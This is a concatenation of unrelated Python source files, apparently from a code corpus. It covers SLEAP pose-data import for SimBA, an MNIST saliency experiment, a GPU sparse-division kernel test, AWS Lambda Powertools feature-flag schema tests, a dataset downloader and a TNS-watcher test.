get_server_color(server_name), 'fields': fields } await channel.send(embed=discord.Embed.from_dict(embed_dict)) service = None def get_service_manager(): global service if service is None: service = DiscordService() return service
11589716
import h5py import pandas as pd import json import cv2 import os, glob from pylab import * import numpy as np import operator from functools import reduce from configparser import ConfigParser, MissingSectionHeaderError, NoOptionError import errno import simba.rw_dfs #def importSLEAPbottomUP(inifile, dataFolder, currIDList): data_folder = r'Z:\DeepLabCut\DLC_extract\Troubleshooting\Sleap_h5\import_folder' configFile = str(r"Z:\DeepLabCut\DLC_extract\Troubleshooting\Sleap_h5\project_folder\project_config.ini") config = ConfigParser() try: config.read(configFile) except MissingSectionHeaderError: print('ERROR: Not a valid project_config file. Please check the project_config.ini path.') projectPath = config.get('General settings', 'project_path') animalIDs = config.get('Multi animal IDs', 'id_list') currIDList = animalIDs.split(",") currIDList = [x.strip(' ') for x in currIDList] filesFound = glob.glob(data_folder + '/*.analysis.h5') videoFolder = os.path.join(projectPath, 'videos') outputDfFolder = os.path.join(projectPath, 'csv', 'input_csv') try: wfileType = config.get('General settings', 'workflow_file_type') except NoOptionError: wfileType = 'csv' animalsNo = len(currIDList) bpNamesCSVPath = os.path.join(projectPath, 'logs', 'measures', 'pose_configs', 'bp_names', 'project_bp_names.csv') poseEstimationSetting = config.get('create ensemble settings', 'pose_estimation_body_parts') print('Converting sleap h5 into dataframes...') csvPaths = [] for filename in filesFound: video_save_name = os.path.basename(filename).replace('analysis.h5', wfileType) savePath = os.path.join(outputDfFolder, video_save_name) bpNames, orderVarList, OrderedBpList, MultiIndexCol, dfHeader, csvFilesFound, xy_heads, bp_cord_names, bpNameList, projBpNameList = [], [], [], [], [], [], [], [], [], [] print('Processing ' + str(os.path.basename(filename)) + '...') hf = h5py.File(filename, 'r') bp_name_list, track_list, = [], [], for bp in hf.get('node_names'): bp_name_list.append(bp.decode('UTF-8')) for track in hf.get('track_names'): track_list.append(track.decode('UTF-8')) track_occupancy = hf.get('track_occupancy') with track_occupancy.astype('int16'): track_occupancy = track_occupancy[:] tracks = hf.get('tracks') with tracks.astype('int16'): tracks = tracks[:] frames = tracks.shape[3] animal_df_list = [] for animals in range(len(track_list)): animal_x_array, animal_y_array = np.transpose(tracks[animals][0]), np.transpose(tracks[animals][1]) animal_p_array = np.zeros(animal_x_array.shape) animal_array = np.ravel([animal_x_array, animal_y_array, animal_p_array], order="F").reshape(frames, len(bp_name_list) * 3) animal_df_list.append(pd.DataFrame(animal_array)) video_df = pd.concat(animal_df_list, axis=1) for animal in range(len(currIDList)): for bp in bp_name_list: colName1, colName2, colName3 = str('Animal_' + str(animal+1) + '_' + bp + '_x'), ('Animal_' + str(animal+1) + '_' + bp + '_y'), ('Animal_' + str(animal+1) + '_' + bp + '_p') xy_heads.extend((colName1, colName2)) bp_cord_names.append('_' + bp + '_x') bp_cord_names.append('_' + bp + '_y') bpNameList.extend((colName1, colName2, colName3)) dfHeader.extend((colName1, colName2, colName3)) if poseEstimationSetting == 'user_defined': config.set("General settings", "animal_no", str(animalsNo)) with open(configFile, "w+") as f: config.write(f) f.close() bpNameListGrouped = [tuple(bpNameList[i:i + 3]) for i in range(0, len(bpNameList), 3)] video_df.columns = dfHeader video_df.fillna(0, inplace=True) simba.rw_dfs.save_df(video_df, wfileType, savePath) csvPaths.append(savePath) print('Saved file ' + savePath + '...') ###### ASSIGN IDENTITIES global currIDcounter def define_ID(event, x, y, flags, param): global currIDcounter if (event == cv2.EVENT_LBUTTONDBLCLK): centerX, centerY, currID = (int(x), int(y), currIDList[currIDcounter]) ID_user_cords.append([centerX, centerY, currIDList[currIDcounter]]) cv2.putText(overlay, str(currID), (centerX, centerY), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (0, 255, 0), 5) currIDcounter += 1 cmap, colorList = cm.get_cmap(str('tab10'), animalsNo + 1), [] for i in range(cmap.N): rgb = list((cmap(i)[:3])) rgb = [i * 255 for i in rgb] rgb.reverse() colorList.append(rgb) for csvFile in csvPaths: indBpCordList, frameNumber, addSpacer, EuclidDistanceList, changeList = [], 0, 2, [], [] ID_user_cords, currIDcounter = [], 0 assigningIDs, completePromt, chooseFrame, assignBpCords = False, False, True, True currDf = simba.rw_dfs.read_df(csvFile, wfileType) vidFname = os.path.join(videoFolder, os.path.basename(csvFile).replace('.csv', '.mp4')) vidBasename = os.path.basename(vidFname) if not os.path.exists(vidFname): raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), vidFname) cap = cv2.VideoCapture(vidFname) if not cap.isOpened(): raise Exception('Con\'t open video file ' + vidFname) width, height = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)), int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) mySpaceScale, myRadius, myResolution, myFontScale = 40, 10, 1500, 1.2 maxResDimension = max(width, height) circleScale, fontScale, spacingScale = int(myRadius / (myResolution / maxResDimension)), float(myFontScale / (myResolution / maxResDimension)), int(mySpaceScale / (myResolution / maxResDimension)) cv2.namedWindow('Define animal IDs', cv2.WINDOW_NORMAL) while (1): if (chooseFrame == True) and (assignBpCords == True): cv2.namedWindow('Define animal IDs', cv2.WINDOW_NORMAL) cap.set(1, frameNumber) ret, frame = cap.read() if not ret: raise Exception('Can\'t read video file ' + vidFname) overlay = frame.copy() for animal_bps in range(len(bpNameListGrouped)): currCols = bpNameListGrouped[animal_bps] currcolor = tuple(colorList[animal_bps]) x_cord = currDf.at[frameNumber, currCols[0]] y_cord = currDf.at[frameNumber, currCols[1]] indBpCordList.append([x_cord, y_cord, currCols[2]]) cv2.circle(overlay, (int(x_cord), int(y_cord)), circleScale, currcolor, -1, lineType=cv2.LINE_AA) for loop, name in enumerate(indBpCordList): currstring = name[2] for substring in bp_cord_names: if substring in currstring: newstring = currstring.replace(substring, '') indBpCordList[loop][2] = newstring imWithCordsOnly = overlay.copy() chooseFrame = False if (chooseFrame == False) and (assignBpCords == True): sideImage = np.ones((int(height / 2), width, 3)) cv2.putText(sideImage, 'Current video: ' + str(vidBasename), (10, int(spacingScale)),cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3) cv2.putText(sideImage, 'Can you assign identities based on the displayed frame ?', (10, int(spacingScale * (addSpacer * 2))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3) cv2.putText(sideImage, 'Press "x" to display new, random, frame', (10, int(spacingScale * (addSpacer * 3))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 0), 3) cv2.putText(sideImage, 'Press "c" to continue to start assigning identities using this frame', (10, int(spacingScale * (addSpacer * 4))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (0, 255), 3) imageConcat = np.concatenate((overlay, sideImage), axis=0) imageConcat = np.uint8(imageConcat) cv2.imshow('Define animal IDs', imageConcat) k = cv2.waitKey(10) if k == ord('x'): cv2.destroyWindow('Define animal IDs') chooseFrame, assignBpCords = True, True frameNumber += 50 elif k == ord('c'): chooseFrame, assignBpCords = False, False assigningIDs, completePromt, assigningIDs = True, False, True if assigningIDs == True: sideImage = np.ones((int(height / 2), width, 3)) cv2.putText(sideImage, 'Double left mouse click on:', (10, int(spacingScale)), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3) cv2.putText(sideImage, str(currIDList[currIDcounter]), (10, int(spacingScale * (addSpacer*2))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 0), 3) imageConcat = np.concatenate((overlay, sideImage), axis=0) imageConcat = np.uint8(imageConcat) cv2.setMouseCallback('Define animal IDs', define_ID) cv2.imshow('Define animal IDs', imageConcat) cv2.waitKey(10) if currIDcounter >= len(currIDList): cv2.destroyWindow('Define animal IDs') assigningIDs, completePromt = False, True if completePromt == True: cv2.namedWindow('Define animal IDs', cv2.WINDOW_NORMAL) sideImage = np.ones((int(height/2), width, 3)) cv2.putText(sideImage, 'Current video: ' + str(vidBasename), (10, int(spacingScale)), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3) cv2.putText(sideImage, 'Are you happy with your assigned identities ?', (10, int(spacingScale * (addSpacer*2))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3) cv2.putText(sideImage, 'Press "c" to continue (to finish, or proceed to the next video)', (10, int(spacingScale * (addSpacer*3))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 0), 3) cv2.putText(sideImage, 'Press "x" to re-start assigning identities', (10, int(spacingScale * (addSpacer*4))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (0, 255, 255), 3) imageConcat = np.concatenate((overlay, sideImage), axis=0) imageConcat = np.uint8(imageConcat) cv2.imshow('Define animal IDs', imageConcat) k = cv2.waitKey(10) if k == ord('c'): cv2.destroyWindow('Define animal IDs') break if k == ord('x'): overlay = imWithCordsOnly.copy() ID_user_cords, currIDcounter = [], 0 assigningIDs, completePromt = True, False print('Re-organizing pose data-frame based on user-assigned identities: ' + str(os.path.basename(vidFname)) + '....') for values in ID_user_cords: currClickedX, currClickedY, currClickedID = values[0], values[1], values[2] for bpCords in indBpCordList: currX, currY, ID = bpCords[0], bpCords[1], bpCords[2] currEuclidian = np.sqrt((currClickedX - currX) ** 2 + (currClickedY - currY) ** 2) EuclidDistanceList.append([currEuclidian, currClickedID, ID]) euclidDf = pd.DataFrame(EuclidDistanceList) euclidDf.columns = ['Distance', 'clickID', 'pose_ID'] for i in currIDList: minDistance = euclidDf.loc[euclidDf['clickID'] == i, 'Distance'].min() animalPoseID = euclidDf.loc[euclidDf['Distance'] == minDistance, 'pose_ID'].iloc[0] changeList.append([animalPoseID, i]) for animal in changeList: currPoseName, newName = animal[0], animal[1] loop = 0 for header in bpNameList: if header.startswith(currPoseName): newHeader = header.replace(currPoseName, newName) bpNameList[loop] = newHeader loop += 1 currDf.columns = bpNameList outDf = pd.DataFrame() for name in currIDList: currCols = [col for col in currDf.columns if name in col] sliceDf = currDf[currCols] outDf = pd.concat([outDf, sliceDf], axis=1) outDfcols = list(outDf.columns) toBpCSVlist = [] if poseEstimationSetting == 'user_defined': for i in outDfcols: currBpName = i[:-2] for identityNo in range(len(currIDList)): if str(currIDList[identityNo]) in currBpName: currBpName = currBpName + '_' + str(identityNo+1) toBpCSVlist.append(currBpName) if currBpName not in toBpCSVlist else toBpCSVlist f = open(bpNamesCSVPath, 'w+') for i in toBpCSVlist: f.write(i + '\n') f.close MultiIndexCol = [] print('@@@@@@@@@@@@@@@@@@@',len(outDf.columns)) for column in range(len(outDf.columns)): MultiIndexCol.append(tuple(('SLEAP_multi', 'SLEAP_multi', outDf.columns[column]))) outDf.columns = pd.MultiIndex.from_tuples(MultiIndexCol, names=['scorer', 'bodypart', 'coords']) outputCSVname = os.path.basename(vidFname).replace('.mp4', '.csv') outDf.to_csv(os.path.join(outputDfFolder, outputCSVname)) print('Imported ', outputCSVname, 'to project.') print('All multi-animal SLEAP .slp tracking files ordered and imported into SimBA project in CSV file format')
11589753
import sys import os from os import path sys.path.append(path.dirname(path.dirname(os.getcwd()))) from arch.sensitivity.GDNet import GDNet from arch.sensitivity.BDNet import BDNet, IsingBDNet, IsingSoftPenaltyBDNet, \ ImageWindowBDNet, OppositeGernarativeL1BDNet from exp.loaddata_utils import load_mnist_keras_test_imgs import torch import torch.nn.functional as F import matplotlib.pyplot as plt import mnist_compare_utils from torch.utils.data import DataLoader, TensorDataset from arch.DeepLiftNet import DeepLiftNet from torchvision.utils import make_grid import argparse import pkgutil import exp.utils_visualise as utils_visualize from scipy.stats import rankdata torch.manual_seed(1) def repeat_img_in_batch(the_img, the_label, batch_size): ''' Return pytorch loader by repeating one img in batch size. :param the_img: numpy img of size [1, 28, 28] :param the_label: integer of class :param batch_size: number to get samples in NN :return: pytorch loader ''' the_img = torch.FloatTensor(the_img) # Repeat the image "batch_size" times repeated_imgs = the_img.unsqueeze(0).expand(batch_size, 1, 28, 28) repeated_labels = torch.LongTensor(1).fill_(int(the_label)).expand(batch_size) return [(repeated_imgs, repeated_labels)] # train_loader = torch.utils.data.DataLoader( # TensorDataset(repeated_imgs, repeated_labels), # batch_size=batch_size, shuffle=False) # return train_loader def load_classifier(cuda_enabled=False): model = DeepLiftNet() model.load_state_dict(torch.load('model/mnist_cnn_allconv_pytorch')) model.float() model.eval() if cuda_enabled: model.cuda() return model def visualize_imgs(imgs, nrow): imgs = torch.from_numpy(imgs) grid = make_grid(imgs, nrow=nrow) def pytorch_to_np(pytorch_image): return pytorch_image.mul(255).clamp(0, 255).byte().permute(1, 2, 0).numpy() ndarr = pytorch_to_np(grid) im = plt.imshow(ndarr, interpolation='nearest') plt.show() def train_log_odds_diff(rank_func, classifier, dataset, from_digit, to_digit, visualize=False, top_number=-1, batch_size=128, cuda_enabled=False): x, y = dataset # Get those images that correpsond to the from_digit class target_x = x[y == from_digit, ...] target_y = y[y == from_digit][:top_number] if top_number > 0: target_x = target_x[:top_number, ...] target_y = target_y[:top_number] # Set up pytorch data and model diff = [] overlayed_imgs = [] ranks = [] for the_x, the_y in zip(target_x, target_y): loader = repeat_img_in_batch(the_x, the_y, batch_size=batch_size) rank = rank_func(classifier, loader) # Rank log odds diff the_img = torch.from_numpy(the_x) log_odds, order, flipped_img = mnist_compare_utils.cal_logodds_diff_btw_two_class( classifier, the_img, from_digit=from_digit, to_digit=to_digit, importance_2d=rank, flip_percentage=0.20, flip_val=0., cuda_enabled=cuda_enabled) diff.append(log_odds[-1] - log_odds[0]) # ranks.append(rank.numpy()) if visualize: # plt.imshow(flipped_img, interpolation='nearest') # plt.colorbar() # plt.show() # img = utils_visualize.overlay(the_x[0, ...], rank.numpy()) img, clim = utils_visualize.overlay(the_x[0, ...], flipped_img) overlayed_imgs.append(torch.from_numpy(img)) return diff, overlayed_imgs, ranks def main(rank_func, from_digit=8, to_digit=3, top_n=2, cuda_enabled=False, visualize=False): classifer = load_classifier(cuda_enabled=cuda_enabled) X_test, y_test = load_mnist_keras_test_imgs() return train_log_odds_diff(rank_func, classifer, (X_test, y_test), from_digit, to_digit, top_number=top_n, batch_size=64, cuda_enabled=cuda_enabled, visualize=visualize) def parse_args(): parser = argparse.ArgumentParser(description='PyTorch Deeplift comparison') parser.add_argument('--model', type=str, default='vbd_opposite', choices=['vbd', 'vgd', 'p_b', 'p_g', 'ising_vbd', 'ising_soft_vbd', 'vbd_window'], help='choose from ["vbd_rank_func", "bern", "add_gauss"]') parser.add_argument('--l1_reg_coef', type=float, default=0.1, help='Only use in IsingBDNet') parser.add_argument('--l2_reg_coef', type=float, default=0., help='Only use in IsingBDNet') parser.add_argument('--window', type=int, default=2, help='Perturbation size. Used in p_b or vbd_window') parser.add_argument('--from-digit', type=int, default=8, help='mask from some digits') parser.add_argument('--to-digit', type=int, default=3, help='masked to some digits') parser.add_argument('--verbose', type=int, default=1) parser.add_argument('--top_n', type=int, default=1, help='-1 means whole test sets') parser.add_argument('--no-cuda', action='store_false', default=True, help='disables CUDA training') parser.add_argument('--visualize', action='store_false', default=True) args, _ = parser.parse_known_args() args.cuda = not args.no_cuda and torch.cuda.is_available() print 'cuda:', args.cuda # CS server settings if args.cuda and pkgutil.find_loader('gpu_lock') is not None: import gpu_lock board = gpu_lock.obtain_lock_id() torch.cuda.set_device(board) print 'start using gpu device: %d' % board return args def run(args): def log_odds_criteria(outputs, targets): # It needs to return the things needs to be minimized. return (outputs[:, args.from_digit] - outputs[:, args.to_digit]).mean() def vbd_opposite(classifier, loader): input_size = (1, 28, 28) vbdnet = OppositeGernarativeL1BDNet(input_size, trained_classifier=classifier, ard_init=0., lr=0.01, reg_coef=0., rw_max=30, cuda_enabled=args.cuda, loss_criteria=log_odds_criteria, verbose=args.verbose) vbdnet.fit(loader, epochs=200, epoch_print=10) # The smaller the dropout rate is, it's less important. rank = vbdnet.logit_p.data[0, ...] return rank def vbd(classifier, loader): input_size = (1, 28, 28) vbdnet = BDNet(input_size, trained_classifier=classifier, ard_init=0., lr=0.01, reg_coef=1E-7, rw_max=30, cuda_enabled=args.cuda, estop_num=10, clip_max=100, flip_val=0., loss_criteria=log_odds_criteria, flip_train=False, verbose=args.verbose, ) vbdnet.fit(loader, epochs=1000, epoch_print=10) # The smaller the dropout rate is, it's less important. rank = vbdnet.logit_p.data[0, ...] return rank def vbd_window(classifier, loader): input_size = (1, 28, 28) rank = ImageWindowBDNet.fit_multiple_windows( loader, epochs=1000, epoch_print=10, dropout_param_size=input_size, trained_classifier=classifier, loss_criteria=log_odds_criteria, ard_init=0., lr=0.01, reg_coef=0., rw_max=30, cuda_enabled=args.cuda, verbose=args.verbose, estop_num=None, clip_max=100, flip_val=0., flip_train=False, window_size=args.window) return rank def _ising_common(classifier, loader, model): input_size = (1, 28, 28) vbdnet = model(input_size, trained_classifier=classifier, ard_init=0., lr=0.01, reg_coef=0., rw_max=30, cuda_enabled=args.cuda, estop_num=10, clip_max=100, flip_val=0., loss_criteria=log_odds_criteria, flip_train=False, verbose=args.verbose, l1_reg_coef=args.l1_reg_coef, l2_reg_coef=args.l2_reg_coef ) vbdnet.fit(loader, epochs=1000, epoch_print=10) # The smaller the dropout rate is, it's rank = vbdnet.logit_p.data[0, ...] return rank def ising_vbd(classifier, loader): return _ising_common(classifier, loader, IsingBDNet) def ising_soft_vbd(classifier, loader): return _ising_common(classifier, loader, IsingSoftPenaltyBDNet) def vgd(classifier, loader, vd_model=GDNet): input_size = (1, 28, 28) gauss_net = vd_model(input_size, trained_classifier=classifier, ard_init=-6., lr=0.03, reg_coef=0., rw_max=30, cuda_enabled=args.cuda, estop_num=1., clip_max=100., loss_criteria=log_odds_criteria, verbose=args.verbose ) gauss_net.fit(loader, epochs=500, epoch_print=10) return gauss_net.log_alpha.data[0, ...] def p_b(classifier, loader): def perturb_by_binary(feature_idx, old_val): return torch.zeros(old_val.size()) classifier.set_criteria(log_odds_criteria) return -mnist_compare_utils.perturb_2d(classifier, loader, perturb_by_binary, window=args.window, cuda_enabled=args.cuda) def p_g(classifier, loader): def perturb_by_multiply_gauss(feature_idx, old_val, var=0.5): return old_val + old_val * var * torch.normal(torch.zeros(*old_val.size()), 1) classifier.set_criteria(log_odds_criteria) return -mnist_compare_utils.perturb_2d(classifier, loader, perturb_by_multiply_gauss, num_samples=10, window=args.window, cuda_enabled=args.cuda) rank_func = eval(args.model) diff, overlayed_imgs, _ = main(rank_func, args.from_digit, args.to_digit, args.top_n, cuda_enabled=args.cuda, visualize=args.visualize) print diff if args.visualize: utils_visualize.save_figs(overlayed_imgs, filename='', visualize=True, nrow=8) else: torch.save(diff, 'result/deeplift-%d-%d-%s-%d.pkl' % (args.from_digit, args.to_digit, args.model, args.window)) return diff, overlayed_imgs if __name__ == '__main__': args = parse_args() run(args)
11589755
import numpy as np import scipy.sparse import akg from akg import tvm from akg import composite from akg.utils import CUDA from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array def csr_div(dense, sparse_data, col_idx, row_idx, shape, target=CUDA): assert target == CUDA, "only supports GPU" return composite.csr_div((row_idx, col_idx, sparse_data, dense), {"dense_shape": shape}) def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.divide(1, np.broadcast_to(dense, shape2))) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def csr_div_run(shape1, shape2, dtype1, dtype2, poly_sch=True, attrs=None): if not attrs: attrs = {"target": "cuda"} # gen data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs["csr_avg_row"] = sparse_data.shape[0] // shape1[0] attrs["is_csr"] = True mod = utils.op_build_test(csr_div, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name="csr_div") if len(expect.shape) == 0: output_shape = (1, ) output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol("csr_div", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print("Test {}".format("Pass" if res else "Failed")) target_name = attrs["target"].split()[0] if not res: mod_source = mod if target_name != "llvm": mod_source = mod.imported_modules[0] print("Error {}:========================".format(target_name)) print(mod_source.get_source()) raise AssertionError("Test fail") if attrs["profiling"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0)) target_profiling(mod, *args_list, target=target_name, repeat_time=attrs["repeat_times"]) return (dense, sparse_data, col_idx, row_idx), output, expect, res
11589805
import logging import pytest # noqa: F401 from aws_lambda_powertools.utilities.feature_flags.exceptions import SchemaValidationError from aws_lambda_powertools.utilities.feature_flags.schema import ( CONDITION_ACTION, CONDITION_KEY, CONDITION_VALUE, CONDITIONS_KEY, FEATURE_DEFAULT_VAL_KEY, RULE_MATCH_VALUE, RULES_KEY, ConditionsValidator, RuleAction, RulesValidator, SchemaValidator, ) logger = logging.getLogger(__name__) EMPTY_SCHEMA = {"": ""} def test_invalid_features_dict(): validator = SchemaValidator(schema=[]) with pytest.raises(SchemaValidationError): validator.validate() def test_empty_features_not_fail(): validator = SchemaValidator(schema={}) validator.validate() @pytest.mark.parametrize( "schema", [ pytest.param({"my_feature": []}, id="feat_as_list"), pytest.param({"my_feature": {}}, id="feat_empty_dict"), pytest.param({"my_feature": {FEATURE_DEFAULT_VAL_KEY: "False"}}, id="feat_default_non_bool"), pytest.param({"my_feature": {FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: "4"}}, id="feat_rules_non_dict"), pytest.param("%<>[]{}|^", id="unsafe-rfc3986"), ], ) def test_invalid_feature(schema): validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() def test_valid_feature_dict(): # empty rules list schema = {"my_feature": {FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: []}} validator = SchemaValidator(schema) validator.validate() # no rules list at all schema = {"my_feature": {FEATURE_DEFAULT_VAL_KEY: False}} validator = SchemaValidator(schema) validator.validate() def test_invalid_rule(): # rules list is not a list of dict schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: [ "a", "b", ], } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() # rules RULE_MATCH_VALUE is not bool schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": { RULE_MATCH_VALUE: "False", } }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() # missing conditions list schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": { RULE_MATCH_VALUE: False, } }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() # condition list is empty schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": {RULE_MATCH_VALUE: False, CONDITIONS_KEY: []}, }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() # condition is invalid type, not list schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": {RULE_MATCH_VALUE: False, CONDITIONS_KEY: {}}, }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() def test_invalid_condition(): # invalid condition action schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": { RULE_MATCH_VALUE: False, CONDITIONS_KEY: {CONDITION_ACTION: "stuff", CONDITION_KEY: "a", CONDITION_VALUE: "a"}, } }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() # missing condition key and value schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": { RULE_MATCH_VALUE: False, CONDITIONS_KEY: {CONDITION_ACTION: RuleAction.EQUALS.value}, } }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() # invalid condition key type, not string schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": { RULE_MATCH_VALUE: False, CONDITIONS_KEY: { CONDITION_ACTION: RuleAction.EQUALS.value, CONDITION_KEY: 5, CONDITION_VALUE: "a", }, } }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() def test_valid_condition_all_actions(): schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 645654 and username is a": { RULE_MATCH_VALUE: True, CONDITIONS_KEY: [ { CONDITION_ACTION: RuleAction.EQUALS.value, CONDITION_KEY: "tenant_id", CONDITION_VALUE: "645654", }, { CONDITION_ACTION: RuleAction.STARTSWITH.value, CONDITION_KEY: "username", CONDITION_VALUE: "a", }, { CONDITION_ACTION: RuleAction.ENDSWITH.value, CONDITION_KEY: "username", CONDITION_VALUE: "a", }, { CONDITION_ACTION: RuleAction.IN.value, CONDITION_KEY: "username", CONDITION_VALUE: ["a", "b"], }, { CONDITION_ACTION: RuleAction.NOT_IN.value, CONDITION_KEY: "username", CONDITION_VALUE: ["c"], }, { CONDITION_ACTION: RuleAction.KEY_IN_VALUE.value, CONDITION_KEY: "username", CONDITION_VALUE: ["a", "b"], }, { CONDITION_ACTION: RuleAction.KEY_NOT_IN_VALUE.value, CONDITION_KEY: "username", CONDITION_VALUE: ["c"], }, { CONDITION_ACTION: RuleAction.VALUE_IN_KEY.value, CONDITION_KEY: "groups", CONDITION_VALUE: "SYSADMIN", }, { CONDITION_ACTION: RuleAction.VALUE_NOT_IN_KEY.value, CONDITION_KEY: "groups", CONDITION_VALUE: "GUEST", }, ], } }, } } validator = SchemaValidator(schema) validator.validate() def test_validate_condition_invalid_condition_type(): # GIVEN an invalid condition type of empty dict condition = {} # WHEN calling validate_condition # THEN raise SchemaValidationError with pytest.raises(SchemaValidationError, match="Feature rule condition must be a dictionary"): ConditionsValidator.validate_condition(condition=condition, rule_name="dummy") def test_validate_condition_invalid_condition_action(): # GIVEN an invalid condition action of foo condition = {"action": "INVALID", "key": "tenant_id", "value": "12345"} # WHEN calling validate_condition # THEN raise SchemaValidationError with pytest.raises(SchemaValidationError, match="'action' value must be either"): ConditionsValidator.validate_condition_action(condition=condition, rule_name="dummy") def test_validate_condition_invalid_condition_key(): # GIVEN a configuration with a missing "key" condition = {"action": RuleAction.EQUALS.value, "value": "12345"} # WHEN calling validate_condition # THEN raise SchemaValidationError with pytest.raises(SchemaValidationError, match="'key' value must be a non empty string"): ConditionsValidator.validate_condition_key(condition=condition, rule_name="dummy") def test_validate_condition_missing_condition_value(): # GIVEN a configuration with a missing condition value condition = { "action": RuleAction.EQUALS.value, "key": "tenant_id", } # WHEN calling validate_condition with pytest.raises(SchemaValidationError, match="'value' key must not be empty"): ConditionsValidator.validate_condition_value(condition=condition, rule_name="dummy") def test_validate_rule_invalid_rule_type(): # GIVEN an invalid rule type of empty list # WHEN calling validate_rule # THEN raise SchemaValidationError with pytest.raises(SchemaValidationError, match="Feature rule must be a dictionary"): RulesValidator.validate_rule(rule=[], rule_name="dummy", feature_name="dummy") def test_validate_rule_invalid_rule_name(): # GIVEN a rule name is empty # WHEN calling validate_rule_name # THEN raise SchemaValidationError with pytest.raises(SchemaValidationError, match="Rule name key must have a non-empty string"): RulesValidator.validate_rule_name(rule_name="", feature_name="dummy")
11589821
import os from .Package import Package from odufrn_downloader.exceptions import odufrIOError class File(Package): """Classe responsável pelo download de pacotes a partir de um arquivo.""" def __init__(self): super().__init__() def download_from_file(self, filename: str, path: str = os.getcwd(), dictionary: bool = True, years: list = None): """Baixa os pacotes de dados que estão escritos em um arquivo de texto. > Exemplo: download_from_file('packages_ufrn.txt') Parâmetros ---------- filename: str nome do arquivo que contêm os pacotes. path: str o caminho da pasta onde serão adicionados os arquivos (por padrão, a pasta atual). dictionary: bool flag para baixar o dicionário dos dados (por padrão, True). years: list define os anos dos dados que serão baixados, se existir realiza-se o download """ try: with open(filename, 'r') as file: for packageName in file: self.download_package( packageName.rstrip(), path, dictionary, years ) except IOError: raise odufrIOError()
11589878
from .morphology import * from .spatialneuron import * __all__ = ['Morphology', 'Soma', 'Cylinder', 'Section', 'SpatialNeuron']
11589899
import pandas import pytest from tns_watcher import get_tns from utils import load_config, log, Mongo """ load config and secrets """ config = load_config(config_file="config.yaml")["kowalski"] class TestTNSWatcher: """ Test TNS monitoring """ @pytest.mark.xfail(raises=pandas.errors.ParserError) def test_tns_watcher(self): log("Connecting to DB") mongo = Mongo( host=config["database"]["host"], port=config["database"]["port"], replica_set=config["database"]["replica_set"], username=config["database"]["username"], password=config["database"]["password"], db=config["database"]["db"], verbose=True, ) log("Successfully connected") collection = config["database"]["collections"]["tns"] log( "Grabbing most recent object from the TNS and ingesting that into the database" ) get_tns( grab_all=False, test=True, ) log("Done") fetched_entries = list(mongo.db[collection].find({}, {"_id": 1})) assert len(fetched_entries) > 0
11589908
